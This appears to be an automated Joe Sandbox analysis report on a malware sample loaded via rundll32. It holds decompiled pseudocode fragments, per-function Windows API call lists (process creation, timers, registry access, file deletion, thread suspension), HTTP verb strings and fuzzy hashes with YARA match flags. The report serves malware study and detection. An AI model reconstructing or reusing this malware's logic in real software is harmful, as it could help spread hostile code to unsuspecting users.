                                            													_t94 = _t94 + 1;
                                            													__eflags = _t94 - _t77;
                                            													 *_t68 = _t110;
                                            													_t110 =  *_t68;
                                            												} while (_t94 <= _t77);
                                            												goto L56;
                                            											}
                                            										}
                                            										_t69 = 0x49fa384 + _t84 * 4;
                                            										while(1) {
                                            											__eflags =  *_t69 - _t110;
                                            											if( *_t69 == _t110) {
                                            												goto L51;
                                            											}
                                            											_t93 = _t93 - 1;
                                            											_t69 = _t69 - 4;
                                            											__eflags = _t93;
                                            											if(_t93 > 0) {
                                            												continue;
                                            											}
                                            											goto L51;
                                            										}
                                            										goto L51;
                                            									}
                                            									_t87 = _v32;
                                            									__eflags =  *_t87 - 0x5a4d;
                                            									if( *_t87 != 0x5a4d) {
                                            										goto L59;
                                            									}
                                            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                            									__eflags =  *_t71 - 0x4550;
                                            									if( *_t71 != 0x4550) {
                                            										goto L59;
                                            									}
                                            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                            									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                            										goto L59;
                                            									}
                                            									_t78 = _t76 - _t87;
                                            									__eflags =  *((short*)(_t71 + 6));
                                            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                            									if( *((short*)(_t71 + 6)) <= 0) {
                                            										goto L59;
                                            									}
                                            									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                            									__eflags = _t78 - _t72;
                                            									if(_t78 < _t72) {
                                            										goto L46;
                                            									}
                                            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                            										goto L46;
                                            									}
                                            									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                            									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                            										goto L20;
                                            									}
                                            									goto L46;
                                            								}
                                            							} else {
                                            								goto L16;
                                            							}
                                            							while(1) {
                                            								L16:
                                            								__eflags =  *((intOrPtr*)(0x49fa388 + _t58 * 4)) - _t110;
                                            								if( *((intOrPtr*)(0x49fa388 + _t58 * 4)) == _t110) {
                                            									break;
                                            								}
                                            								_t58 = _t58 + 1;
                                            								__eflags = _t58 - _t81;
                                            								if(_t58 < _t81) {
                                            									continue;
                                            								}
                                            								goto L18;
                                            							}
                                            							__eflags = _t58;
                                            							if(_t58 <= 0) {
                                            								goto L5;
                                            							}
                                            							 *0x49fa3c8 = 1;
                                            							__eflags =  *0x49fa3c8;
                                            							if( *0x49fa3c8 != 0) {
                                            								goto L5;
                                            							}
                                            							__eflags =  *((intOrPtr*)(0x49fa388 + _t58 * 4)) - _t110;
                                            							if( *((intOrPtr*)(0x49fa388 + _t58 * 4)) == _t110) {
                                            								L32:
                                            								_t100 = 0;
                                            								__eflags = _t58;
                                            								if(_t58 < 0) {
                                            									L34:
                                            									 *0x49fa3c8 = 0;
                                            									goto L5;
                                            								} else {
                                            									goto L33;
                                            								}
                                            								do {
                                            									L33:
                                            									_t90 = 0x49fa388 + _t100 * 4;
                                            									_t100 = _t100 + 1;
                                            									__eflags = _t100 - _t58;
                                            									 *_t90 = _t110;
                                            									_t110 =  *_t90;
                                            								} while (_t100 <= _t58);
                                            								goto L34;
                                            							}
                                            							_t25 = _t81 - 1; // -1
                                            							_t58 = _t25;
                                            							__eflags = _t58;
                                            							if(_t58 < 0) {
                                            								L28:
                                            								__eflags = _t81 - 0x10;
                                            								if(_t81 < 0x10) {
                                            									_t81 = _t81 + 1;
                                            									__eflags = _t81;
                                            									 *0x49fa380 = _t81;
                                            								}
                                            								_t28 = _t81 - 1; // 0x0
                                            								_t58 = _t28;
                                            								goto L32;
                                            							} else {
                                            								goto L25;
                                            							}
                                            							while(1) {
                                            								L25:
                                            								__eflags =  *((intOrPtr*)(0x49fa388 + _t58 * 4)) - _t110;
                                            								if( *((intOrPtr*)(0x49fa388 + _t58 * 4)) == _t110) {
                                            									break;
                                            								}
                                            								_t58 = _t58 - 1;
                                            								__eflags = _t58;
                                            								if(_t58 >= 0) {
                                            									continue;
                                            								}
                                            								break;
                                            							}
                                            							__eflags = _t58;
                                            							if(__eflags >= 0) {
                                            								if(__eflags == 0) {
                                            									goto L34;
                                            								}
                                            								goto L32;
                                            							}
                                            							goto L28;
                                            						}
                                            						_t75 =  *((intOrPtr*)(_t108 - 8));
                                            						__eflags = _t75 - _v8;
                                            						if(_t75 < _v8) {
                                            							goto L20;
                                            						}
                                            						__eflags = _t75 - _t108;
                                            						if(_t75 >= _t108) {
                                            							goto L20;
                                            						}
                                            						goto L15;
                                            					}
                                            					L5:
                                            					_t63 = 1;
                                            					goto L60;
                                            				} else {
                                            					goto L3;
                                            				}
                                             			}

                                            APIs
                                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 049F84F2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: MemoryQueryVirtual
                                            • String ID:
                                            • API String ID: 2850889275-0
                                            • Opcode ID: 215b05fe89e0caa1f03109a7222161707500d84da1910a60222e4b0fbd528bd4
                                            • Instruction ID: e119265f7f448d44f18db81fa42c9bb2b69b23e04ed61867bba3d3bf3b0f4f7e
                                            • Opcode Fuzzy Hash: 215b05fe89e0caa1f03109a7222161707500d84da1910a60222e4b0fbd528bd4
                                            • Instruction Fuzzy Hash: 786118317002129FDBA9EE28CC9062933EAFB85358F248879DB56CB290E775F842C740
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 058148FB
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateProcessUser
                                            • String ID:
                                            • API String ID: 2217836671-0
                                            • Opcode ID: 1a75e31db1659823c9ac8ffbf092e6016d2fed7cf4c4fb328e9f03076344a9ae
                                            • Instruction ID: 9b0a2498154e9dcf2f981997d94ca176439abc1ccd03d36ad0f8bda1d2a0d233
                                            • Opcode Fuzzy Hash: 1a75e31db1659823c9ac8ffbf092e6016d2fed7cf4c4fb328e9f03076344a9ae
                                            • Instruction Fuzzy Hash: 7D119032214249AFDF125F99DD01DEA7FAAFF08364B054215FE1992130CB32D871AB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 058029CA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorStatus
                                            • String ID:
                                            • API String ID: 1596131371-0
                                            • Opcode ID: ba2a57f9f51b039e294d7d275b36607c353d4c9a7cd8d12a2f1352308fefcdcb
                                            • Instruction ID: 735692547fb757b2c61571c34d1548283b6e99f7347cd50f3419e72ad687f549
                                            • Opcode Fuzzy Hash: ba2a57f9f51b039e294d7d275b36607c353d4c9a7cd8d12a2f1352308fefcdcb
                                            • Instruction Fuzzy Hash: B2C012365052026BDE195751DC29D2A7E11FF50300F04941DB946C1070CA70A490DB10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 71%
                                            			E049F821C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                            				intOrPtr _v8;
                                            				char _v12;
                                            				void* __ebp;
                                            				signed int* _t43;
                                            				char _t44;
                                            				void* _t46;
                                            				void* _t49;
                                            				intOrPtr* _t53;
                                            				void* _t54;
                                            				void* _t65;
                                            				long _t66;
                                            				signed int* _t80;
                                            				signed int* _t82;
                                            				void* _t84;
                                            				signed int _t86;
                                            				void* _t89;
                                            				void* _t95;
                                            				void* _t96;
                                            				void* _t99;
                                            				void* _t106;
                                            
                                            				_t43 = _t84;
                                            				_t65 = __ebx + 2;
                                            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                            				_t89 = _t95;
                                            				_t96 = _t95 - 8;
                                            				_push(_t65);
                                            				_push(_t84);
                                            				_push(_t89);
                                            				asm("cld");
                                            				_t66 = _a8;
                                            				_t44 = _a4;
                                            				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                            					_push(_t89);
                                            					E049F8387(_t66 + 0x10, _t66, 0xffffffff);
                                            					_t46 = 1;
                                            				} else {
                                            					_v12 = _t44;
                                            					_v8 = _a12;
                                            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                            					_t86 =  *(_t66 + 0xc);
                                            					_t80 =  *(_t66 + 8);
                                            					_t49 = E049F8441(_t66);
                                            					_t99 = _t96 + 4;
                                            					if(_t49 == 0) {
                                            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                            						goto L11;
                                            					} else {
                                            						while(_t86 != 0xffffffff) {
                                            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                            							if(_t53 == 0) {
                                            								L8:
                                            								_t80 =  *(_t66 + 8);
                                            								_t86 = _t80[_t86 + _t86 * 2];
                                            								continue;
                                            							} else {
                                            								_t54 =  *_t53();
                                            								_t89 = _t89;
                                            								_t86 = _t86;
                                            								_t66 = _a8;
                                            								_t55 = _t54;
                                            								_t106 = _t54;
                                            								if(_t106 == 0) {
                                            									goto L8;
                                            								} else {
                                            									if(_t106 < 0) {
                                            										_t46 = 0;
                                            									} else {
                                            										_t82 =  *(_t66 + 8);
                                            										E049F832C(_t55, _t66);
                                            										_t89 = _t66 + 0x10;
                                            										E049F8387(_t89, _t66, 0);
                                            										_t99 = _t99 + 0xc;
                                            										E049F8423(_t82[2]);
                                            										 *(_t66 + 0xc) =  *_t82;
                                            										_t66 = 0;
                                            										_t86 = 0;
                                            										 *(_t82[2])(1);
                                            										goto L8;
                                            									}
                                            								}
                                            							}
                                            							goto L13;
                                            						}
                                            						L11:
                                            						_t46 = 1;
                                            					}
                                            				}
                                            				L13:
                                            				return _t46;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                            • Instruction ID: 1cf6711c30a5207b0346daafe93d0d05c77f39079dbf26977bea1e7b0c529937
                                            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                            • Instruction Fuzzy Hash: A121B6729006049FDB50EFA8CC809A7BBA9FF45360B458578DA559B245EB30F915CBE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                            • Instruction ID: f21dfc5e7a56ded5dab5884c7295d3741dc83ec4c3d990c77b77877d3fc71d24
                                            • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                            • Instruction Fuzzy Hash: B1212472A00218AFCB10DF68C890867BFA5BF44310B058868DC06CB245DB34FD55CBE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0581B138: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0581B16C
                                              • Part of subcall function 0581B138: GetLastError.KERNEL32 ref: 0581B22D
                                              • Part of subcall function 0581B138: ReleaseMutex.KERNEL32(00000000), ref: 0581B236
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05821DA2
                                              • Part of subcall function 058047FF: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05804819
                                              • Part of subcall function 058047FF: CreateWaitableTimerA.KERNEL32(05829208,?,?), ref: 05804836
                                              • Part of subcall function 058047FF: GetLastError.KERNEL32(?,?), ref: 05804847
                                              • Part of subcall function 058047FF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 05804887
                                              • Part of subcall function 058047FF: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 058048A6
                                              • Part of subcall function 058047FF: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 058048BC
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05821E05
                                            • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000), ref: 05821E81
                                            • StrTrimA.SHLWAPI(00000000,?), ref: 05821EA3
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 05821EE3
                                              • Part of subcall function 0581EBC8: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 0581EBEA
                                              • Part of subcall function 0581EBC8: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?), ref: 0581EC18
                                            • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 05821F89
                                            • CloseHandle.KERNEL32(?), ref: 05822218
                                              • Part of subcall function 05812D5C: WaitForSingleObject.KERNEL32(?,00000000), ref: 05812D68
                                              • Part of subcall function 05812D5C: HeapFree.KERNEL32(00000000,?,?), ref: 05812D96
                                              • Part of subcall function 05812D5C: ResetEvent.KERNEL32(?,?), ref: 05812DB0
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 05821FBE
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 05821FCD
                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 05821FFA
                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05822014
                                            • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 0582205C
                                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 05822076
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0582208C
                                            • ReleaseMutex.KERNEL32(?), ref: 058220A9
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 058220BA
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 058220C9
                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 058220FD
                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05822117
                                            • SwitchToThread.KERNEL32 ref: 05822119
                                            • ReleaseMutex.KERNEL32(?), ref: 05822123
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 05822161
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0582216C
                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 0582218F
                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 058221A9
                                            • SwitchToThread.KERNEL32 ref: 058221AB
                                            • ReleaseMutex.KERNEL32(?), ref: 058221B5
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 058221CA
                                            • CloseHandle.KERNEL32(?), ref: 0582222C
                                            • CloseHandle.KERNEL32(?), ref: 05822238
                                            • CloseHandle.KERNEL32(?), ref: 05822244
                                            • CloseHandle.KERNEL32(?), ref: 05822250
                                            • CloseHandle.KERNEL32(?), ref: 0582225C
                                            • CloseHandle.KERNEL32(?), ref: 05822268
                                            • CloseHandle.KERNEL32(?), ref: 05822274
                                            • RtlExitUserThread.NTDLL(00000000), ref: 05822283
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                                            • String ID:
                                            • API String ID: 2369282788-0
                                            • Opcode ID: d3e0aa4664b8e1b1a562bae47296943738cf5aa70a9bfde1fa5aa2952c30b912
                                            • Instruction ID: adfa0546b90da721996e6428b99e6765b7d4b664fba6ef8786a44b64afbf364f
                                            • Opcode Fuzzy Hash: d3e0aa4664b8e1b1a562bae47296943738cf5aa70a9bfde1fa5aa2952c30b912
                                            • Instruction Fuzzy Hash: 0FF18171518315AFDB20AF69CC8596ABFE9FB44354F004A29FD96D21A0DB31AC84CF53
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 05819876
                                            • memcpy.NTDLL(?,?,00000010), ref: 05819899
                                            • memset.NTDLL ref: 058198E5
                                            • lstrcpyn.KERNEL32(?,?,00000034), ref: 058198F9
                                            • GetLastError.KERNEL32 ref: 05819927
                                            • GetLastError.KERNEL32 ref: 0581996E
                                            • GetLastError.KERNEL32 ref: 0581998D
                                            • WaitForSingleObject.KERNEL32(?,000927C0), ref: 058199C7
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 058199D5
                                            • GetLastError.KERNEL32 ref: 05819A4F
                                            • ReleaseMutex.KERNEL32(?), ref: 05819A61
                                            • RtlExitUserThread.NTDLL(?), ref: 05819A77
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05819AA0
                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 05819ABD
                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000010), ref: 05819B0D
                                            • DeleteFileW.KERNEL32(00000000,?,?,?,00000000,00000010), ref: 05819B17
                                            • GetLastError.KERNEL32 ref: 05819B21
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05819B32
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000010), ref: 05819B54
                                            • HeapFree.KERNEL32(00000000,?), ref: 05819B8B
                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05819B9F
                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000010), ref: 05819BA8
                                            • SuspendThread.KERNEL32(?), ref: 05819BB7
                                            • CreateEventA.KERNEL32(05829208,00000001,00000000), ref: 05819BCB
                                            • SetEvent.KERNEL32(00000000), ref: 05819BD8
                                            • CloseHandle.KERNEL32(00000000), ref: 05819BDF
                                            • Sleep.KERNEL32(000001F4), ref: 05819BF2
                                            • ResumeThread.KERNEL32(?), ref: 05819C16
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$CloseFreeHeapObjectSingleThreadWait$CriticalEventHandleSection$CreateDeleteEnterExitFileLeaveMutexOpenReleaseResumeSleepSuspendUserlstrcpynmemcpymemset
                                            • String ID: v
                                            • API String ID: 4191902400-1801730948
                                            • Opcode ID: 211462847c8e004a0496096e3df86c36bb9350f37db9ac39f88393b9e1b391f0
                                            • Instruction ID: 4e0a9d126a5fd68d664bf79ba54d973cb4a588ac95a8ae1008d96c8f61a6d28d
                                            • Opcode Fuzzy Hash: 211462847c8e004a0496096e3df86c36bb9350f37db9ac39f88393b9e1b391f0
                                            • Instruction Fuzzy Hash: 37B16A72A14305AFDB20AF65D88996ABFBDFB84310F008929FD56D2150DB70A984CF66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL ref: 0580AAA5
                                            • GetTickCount.KERNEL32 ref: 0580AABF
                                            • wsprintfA.USER32 ref: 0580AB12
                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 0580AB1E
                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0580AB29
                                            • _aulldiv.NTDLL(?,?,?,?), ref: 0580AB3F
                                            • wsprintfA.USER32 ref: 0580AB55
                                            • wsprintfA.USER32 ref: 0580AB7A
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580AB8D
                                            • wsprintfA.USER32 ref: 0580ABB1
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580ABC4
                                            • wsprintfA.USER32 ref: 0580ABFE
                                            • wsprintfA.USER32 ref: 0580AC22
                                            • lstrcat.KERNEL32(?,?), ref: 0580AC5A
                                              • Part of subcall function 0581A670: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000,?,?,?,0580D3E9,?,?), ref: 0581A730
                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0580AC74
                                            • GetTickCount.KERNEL32 ref: 0580AC84
                                            • RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 0580AC98
                                            • RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 0580ACB6
                                            • StrTrimA.SHLWAPI(00000000,058243E8,00000000,05D7C310), ref: 0580ACEF
                                            • lstrcpy.KERNEL32(00000000,?), ref: 0580AD11
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0580AD18
                                            • lstrcat.KERNEL32(00000000,?), ref: 0580AD1F
                                            • lstrcat.KERNEL32(00000000,?), ref: 0580AD26
                                            • HeapFree.KERNEL32(00000000,?,00000000,00000000,00000000,00000001,?,00000000), ref: 0580ADA0
                                            • HeapFree.KERNEL32(00000000,?,00000000), ref: 0580ADB2
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,05D7C310), ref: 0580ADC1
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0580ADD3
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580ADE5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$wsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveObjectSingleTrimWait_aulldiv
                                            • String ID:
                                            • API String ID: 3322690043-0
                                            • Opcode ID: db4d4ce5be47514417405c08878d7034dabf622ad6deae36eceb67f804bb77d9
                                            • Instruction ID: d8472a9e231ae920bff0978edff17d96c7d81fb5816e20c43ce866918b6ffd55
                                            • Opcode Fuzzy Hash: db4d4ce5be47514417405c08878d7034dabf622ad6deae36eceb67f804bb77d9
                                            • Instruction Fuzzy Hash: B2A15B71614305AFDB61DFA8EC89E6A7FE9FB48210F048415FD09C22A0DB35E895CF66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(?,?,05829190), ref: 0581D0BB
                                            • RtlAllocateHeap.NTDLL(00000000,05828AA9,?), ref: 0581D157
                                            • lstrcpyn.KERNEL32(00000000,?,05828AA9,?,05829190), ref: 0581D16C
                                            • HeapFree.KERNEL32(00000000,00000000,?,05829190), ref: 0581D187
                                            • StrChrA.SHLWAPI(?,00000020,05828AA8,?,?,05829190), ref: 0581D26E
                                            • StrChrA.SHLWAPI(00000001,00000020,?,05829190), ref: 0581D27F
                                            • lstrlen.KERNEL32(00000000,?,05829190), ref: 0581D293
                                            • memmove.NTDLL(05828AA9,?,00000001,?,05829190), ref: 0581D2A3
                                            • lstrlen.KERNEL32(?,05828AA8,?,?,05829190), ref: 0581D2CF
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0581D2F5
                                            • memcpy.NTDLL(00000000,?,?,?,05829190), ref: 0581D309
                                            • memcpy.NTDLL(05828AA8,?,?,?,05829190), ref: 0581D329
                                            • HeapFree.KERNEL32(00000000,05828AA8,?,?,?,?,?,?,?,?,05829190), ref: 0581D365
                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0581D42B
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 0581D473
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                                            • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                            • API String ID: 3227826163-647159250
                                            • Opcode ID: e82551fd4665712758e4a009c81b59df82aeed678a878b206ca81e151fc838cc
                                            • Instruction ID: 4f4dcd9c3685de761e211151fbde98a58983dbfa1c87c9ace0b0be8ed6f0c513
                                            • Opcode Fuzzy Hash: e82551fd4665712758e4a009c81b59df82aeed678a878b206ca81e151fc838cc
                                            • Instruction Fuzzy Hash: 24E12571A01209AFDB25DFA8C889BAABBB9FF04310F148559FD16EB250DB30ED51CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL ref: 0580817E
                                            • wsprintfA.USER32 ref: 058081E8
                                            • wsprintfA.USER32 ref: 0580822E
                                            • wsprintfA.USER32 ref: 0580824F
                                            • lstrcat.KERNEL32(00000000,?), ref: 05808286
                                            • wsprintfA.USER32 ref: 058082A7
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 058082C1
                                            • wsprintfA.USER32 ref: 058082E8
                                            • HeapFree.KERNEL32(00000000,?), ref: 058082FD
                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 05808317
                                            • RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 05808338
                                            • RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 05808352
                                              • Part of subcall function 0580A1EA: lstrlen.KERNEL32(00000000,75BCC740,?,00000000,76CC81D0,?,?,0580ACCC,00000000,05D7C310), ref: 0580A215
                                              • Part of subcall function 0580A1EA: lstrlen.KERNEL32(?,?,?,0580ACCC,00000000,05D7C310), ref: 0580A21D
                                              • Part of subcall function 0580A1EA: strcpy.NTDLL ref: 0580A234
                                              • Part of subcall function 0580A1EA: lstrcat.KERNEL32(00000000,?), ref: 0580A23F
                                              • Part of subcall function 0580A1EA: StrTrimA.SHLWAPI(00000000,=,00000000,?,?,0580ACCC,00000000,05D7C310), ref: 0580A25C
                                            • StrTrimA.SHLWAPI(00000000,058243E8,00000000,05D7C310), ref: 05808387
                                              • Part of subcall function 0581E631: lstrlen.KERNEL32(05D78560,00000000,00000000,76CC81D0,0580ACFB,00000000), ref: 0581E641
                                              • Part of subcall function 0581E631: lstrlen.KERNEL32(?), ref: 0581E649
                                              • Part of subcall function 0581E631: lstrcpy.KERNEL32(00000000,05D78560), ref: 0581E65D
                                              • Part of subcall function 0581E631: lstrcat.KERNEL32(00000000,?), ref: 0581E668
                                            • lstrcpy.KERNEL32(?,?), ref: 058083B0
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 058083BA
                                            • lstrcat.KERNEL32(00000000,?), ref: 058083C5
                                            • lstrcat.KERNEL32(00000000,?), ref: 058083CC
                                            • RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 058083D7
                                            • RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 058083F3
                                              • Part of subcall function 0580FEA8: memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,0581F51A,00000000,00000000), ref: 0580FEF9
                                              • Part of subcall function 0580FEA8: memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 0580FF8C
                                            • HeapFree.KERNEL32(00000000,?,00000001,05D7C310,?,?,?), ref: 058084BA
                                            • HeapFree.KERNEL32(00000000,?,?), ref: 058084D2
                                            • HeapFree.KERNEL32(00000000,?,00000000,05D7C310), ref: 058084E0
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 058084EE
